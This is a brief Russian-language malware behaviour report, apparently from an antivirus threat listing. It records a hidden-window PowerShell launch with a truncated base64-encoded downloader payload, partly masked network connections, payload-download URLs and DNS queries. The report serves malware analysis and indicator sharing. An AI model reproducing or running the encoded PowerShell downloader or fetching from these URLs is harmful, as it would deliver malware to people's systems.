Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAOQA2ADUANgBfAF8APQAoACcAdABfADUAMwBfACcAKwAnADIAJwArACcANgAnACkAOwAkAHUANwBfADQAMwA3ADUAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABvADUAMgA5ADAAMQA5AD...
- 'tj####inings.com':80
- 'di###.center':80
- 'di###center.com':443
- 'ge###tronics.in':80
- http://di###.center/2OTZiNbRxnb2
- http://www.ge###tronics.in/wordpress/wp-content/ETGjNx1_g
- 'di###center.com':443
- DNS ASK su#####iatduchung.com
- DNS ASK tj####inings.com
- DNS ASK so##.lpbes.org
- DNS ASK di###.center
- DNS ASK di###center.com
- DNS ASK ge###tronics.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAOQA2ADUANgBfAF8APQAoACcAdABfADUAMwBfACcAKwAnADIAJwArACcANgAnACkAOwAkAHUANwBfADQAMwA3ADUAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABvADUAMgA5ADAAMQA5AD...' (со скрытым окном)